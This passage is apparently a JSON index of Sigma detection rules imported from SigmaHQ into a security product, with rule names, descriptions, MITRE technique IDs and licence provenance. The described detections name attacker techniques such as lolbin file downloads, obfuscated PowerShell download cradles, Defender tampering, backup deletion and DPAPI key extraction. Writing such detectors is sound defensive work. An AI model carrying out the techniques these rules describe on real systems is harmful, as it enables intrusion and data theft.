"sigmahq-sigma-42df45e7-e6e9-43b5-8f26-bec5b39cc239", "type": "detection", "name": "System Information Discovery", "description": "Detects system information discovery commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/system-information-discovery.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42df45e7-e6e9-43b5-8f26-bec5b39cc239", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml" } }, { "id": "sigmahq-sigma-43103702-5886-11ed-9b6a-0242ac120002", "type": "detection", "name": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-vsls-agent-command-with-agentextensionpath-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "43103702-5886-11ed-9b6a-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml" } }, { "id": "sigmahq-sigma-431a1fdb-4799-4f3b-91c3-a683b003fc49", "type": "detection", "name": "New Kernel Driver Via SC.EXE", "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-kernel-driver-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "431a1fdb-4799-4f3b-91c3-a683b003fc49", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_new_kernel_driver.yml" } }, { "id": "sigmahq-sigma-434c08ba-8406-4d15-8b24-782cb071a691", "type": "detection", "name": "PowerShell Execution With Potential Decryption Capabilities", "description": "Detects PowerShell commands that decrypt an \".LNK\" file to drop the next stage of the malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-execution-with-potential-decryption-capabilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "434c08ba-8406-4d15-8b24-782cb071a691", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_decrypt_pattern.yml" } }, { "id": "sigmahq-sigma-4358e5a5-7542-4dcb-b9f3-87667371839b", "type": "detection", "name": "ISO or Image Mount Indicator in Recent Files", "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/iso-or-image-mount-indicator-in-recent-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4358e5a5-7542-4dcb-b9f3-87667371839b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_iso_file_recent.yml" } }, { "id": "sigmahq-sigma-435e10e4-992a-4281-96f3-38b11106adde", "type": "detection", "name": "Computer Discovery And Export Via Get-ADComputer Cmdlet", "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/computer-discovery-and-export-via-get-adcomputer-cmdlet.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "435e10e4-992a-4281-96f3-38b11106adde", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" } }, { "id": "sigmahq-sigma-4368354e-1797-463c-bc39-a309effbe8d7", "type": "detection", "name": "Powershell Add Name Resolution Policy Table Rule", "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1565" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-add-name-resolution-policy-table-rule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4368354e-1797-463c-bc39-a309effbe8d7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml" } }, { "id": "sigmahq-sigma-438025f9-5856-4663-83f7-52f878a70a50", "type": "detection", "name": "Suspicious Microsoft Office Child Process", "description": "Detects a suspicious process spawning from one of the Microsoft Office suite 
products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1204.002", "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-microsoft-office-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "438025f9-5856-4663-83f7-52f878a70a50", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_susp_child_processes.yml" } }, { "id": "sigmahq-sigma-439957a7-ad86-4a8f-9705-a28131c6821b", "type": "detection", "name": "Old TLS1.0/TLS1.1 Protocol Version Enabled", "description": "Detects applications or users re-enabling old TLS versions by setting the \"Enabled\" value to \"1\" for the \"Protocols\" registry key.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/old-tls1-0-tls1-1-protocol-version-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "439957a7-ad86-4a8f-9705-a28131c6821b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml" } }, { "id": "sigmahq-sigma-43d91656-a9b2-4541-b7e2-6a9bd3a13f4e", "type": "detection", "name": "DSInternals Suspicious PowerShell Cmdlets", "description": "Detects execution and usage of the DSInternals PowerShell module, which can be used to perform what might be considered suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.\nThe DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dsinternals-suspicious-powershell-cmdlets.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "43d91656-a9b2-4541-b7e2-6a9bd3a13f4e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_dsinternals_cmdlets.yml" } }, { "id": "sigmahq-sigma-43e26eb5-cd58-48d1-8ce9-a273f5d298d8", "type": "detection", "name": "Potential Container Discovery Via Inodes Listing", "description": "Detects listing of the inodes of the \"/\" directory to determine if we are running inside of a container.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": 
null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-container-discovery-via-inodes-listing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "43e26eb5-cd58-48d1-8ce9-a273f5d298d8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml" } }, { "id": "sigmahq-sigma-43e32da2-fdd0-4156-90de-50dfd62636f9", "type": "detection", "name": "Dism Remove Online Package", "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dism-remove-online-package.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "43e32da2-fdd0-4156-90de-50dfd62636f9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dism_remove.yml" } }, { "id": "sigmahq-sigma-43fa5350-db63-4b8f-9a01-789a427074e1", "type": "detection", "name": "Potential Obfuscated Ordinal Call Via Rundll32", "description": "Detects execution of \"rundll32\" with potential obfuscated ordinal calls", "version": "1.0.0", 
"author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-obfuscated-ordinal-call-via-rundll32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "43fa5350-db63-4b8f-9a01-789a427074e1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml" } }, { "id": "sigmahq-sigma-44030449-b0df-4c94-aae1-502359ab28ee", "type": "detection", "name": "PUA - TruffleHog Execution", "description": "Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. 
that could be used maliciously.\nWhile it is a legitimate tool, intended for use in CI pipelines and security assessments,\nIt was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083", "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-trufflehog-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "44030449-b0df-4c94-aae1-502359ab28ee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_trufflehog.yml" } }, { "id": "sigmahq-sigma-44143844-0631-49ab-97a0-96387d6b2d7c", "type": "detection", "name": "File Download Using Notepad++ GUP Utility", "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-using-notepad-gup-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "44143844-0631-49ab-97a0-96387d6b2d7c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_gup_download.yml" } }, { "id": "sigmahq-sigma-4480827a-9799-4232-b2c4-ccc6c4e9e12b", "type": "detection", "name": "Suspicious CertReq Command to Download", "description": "Detects a suspicious CertReq execution downloading a file.\nThis behavior is often used by attackers to download additional payloads or configuration files.\nCertreq is a built-in Windows utility used to request and retrieve certificates from a certification authority (CA). However, it can be abused by threat actors for malicious purposes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-certreq-command-to-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certreq_download.yml" } }, { "id": "sigmahq-sigma-448fd1ea-2116-4c62-9cde-a92d120e0f08", "type": "detection", "name": "Azure Service Principal Removed", "description": "Identifies when a service principal was removed in Azure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-service-principal-removed.yaml", "quarantine_reason": "imported 
rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "448fd1ea-2116-4c62-9cde-a92d120e0f08", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_service_principal_removed.yml" } }, { "id": "sigmahq-sigma-44a22d59-b175-4f13-8c16-cbaef5b581ff", "type": "detection", "name": "New File Association Using Exefile", "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-file-association-using-exefile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_file_association_exefile.yml" } }, { "id": "sigmahq-sigma-44e24481-6202-4c62-9127-5a0ae8e3fe3d", "type": "detection", "name": "Obfuscated PowerShell OneLiner Execution", "description": "Detects the execution of a specific OneLiner to download and execute powershell modules in memory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": 
false, "path": "detections/sigma-imports/_quarantine/obfuscated-powershell-oneliner-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "44e24481-6202-4c62-9127-5a0ae8e3fe3d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_download_cradle_obfuscated.yml" } }, { "id": "sigmahq-sigma-4508a70e-97ef-4300-b62b-ff27992990ea", "type": "detection", "name": "DotNet CLR DLL Loaded By Scripting Applications", "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dotnet-clr-dll-loaded-by-scripting-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4508a70e-97ef-4300-b62b-ff27992990ea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" } }, { "id": "sigmahq-sigma-45239e6a-b035-4aaf-b339-8ad379fcb67e", "type": "detection", "name": "Process Proxy Execution Via Squirrel.EXE", "description": "Detects the usage of the \"Squirrel.exe\" binary to execute arbitrary processes. 
This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-proxy-execution-via-squirrel-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "45239e6a-b035-4aaf-b339-8ad379fcb67e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_squirrel_proxy_execution.yml" } }, { "id": "sigmahq-sigma-452bce90-6fb0-43cc-97a5-affc283139b3", "type": "detection", "name": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", "description": "Detects the usage of \"reg.exe\" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-windows-defender-registry-key-tampering-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "452bce90-6fb0-43cc-97a5-affc283139b3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_windows_defender_tamper.yml" } }, { "id": "sigmahq-sigma-452df256-da78-427a-866f-49fa04417d74", "type": "detection", "name": "Time Machine Backup Deletion Attempt Via Tmutil - MacOS", "description": "Detects deletion attempts of MacOS Time Machine backups via the native backup utility \"tmutil\".\nAn adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/time-machine-backup-deletion-attempt-via-tmutil-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "452df256-da78-427a-866f-49fa04417d74", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml" } }, { "id": "sigmahq-sigma-45545954-4016-43c6-855e-eae8f1c369dc", "type": "detection", "name": "Protected Storage Service Access", "description": "Detects access to a protected_storage service over the network. 
Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/protected-storage-service-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "45545954-4016-43c6-855e-eae8f1c369dc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_protected_storage_service_access.yml" } }, { "id": "sigmahq-sigma-455b9d50-15a1-4b99-853f-8d37655a4c1b", "type": "detection", "name": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", "description": "Detects active directory enumeration activity using known AdFind CLI flags", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-suspicious-activedirectory-enumeration-via-adfind-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration.yml" } }, { "id": 
"sigmahq-sigma-457cc9ac-d8e6-4d1d-8c0e-251d0f11a74c", "type": "detection", "name": "Modification or Deletion of an AWS RDS Cluster", "description": "Detects modifications to an RDS cluster or its deletion, which may indicate potential data exfiltration attempts, unauthorized access, or exposure of sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1020" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/modification-or-deletion-of-an-aws-rds-cluster.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "457cc9ac-d8e6-4d1d-8c0e-251d0f11a74c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_rds_dbcluster_actions.yml" } }, { "id": "sigmahq-sigma-457df417-8b9d-4912-85f3-9dbda39c3645", "type": "detection", "name": "Suspicious Nohup Execution", "description": "Detects execution of binaries located in potentially suspicious locations via \"nohup\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-nohup-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "457df417-8b9d-4912-85f3-9dbda39c3645", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml" } }, { "id": "sigmahq-sigma-45810b50-7edc-42ca-813b-bdac02fb946b", "type": "detection", "name": "Steganography Hide Zip Information in Picture File", "description": "Detects appending of zip file to image", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/steganography-hide-zip-information-in-picture-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "45810b50-7edc-42ca-813b-bdac02fb946b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_hidden_zip_files_steganography.yml" } }, { "id": "sigmahq-sigma-459a2970-bb84-4e6a-a32e-ff0fbd99448d", "type": "detection", "name": "Azure Key Vault Modified or Deleted", "description": "Identifies when a key vault is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552", "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-key-vault-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "459a2970-bb84-4e6a-a32e-ff0fbd99448d", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_keyvault_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", "type": "detection", "name": "Arbitrary File Download Via MSOHTMED.EXE", "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-file-download-via-msohtmed-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msohtmed_download.yml" } }, { "id": "sigmahq-sigma-45a594aa-1fbd-4972-a809-ff5a99dd81b8", "type": "detection", "name": "Run PowerShell Script from ADS", "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/run-powershell-script-from-ads.yaml", 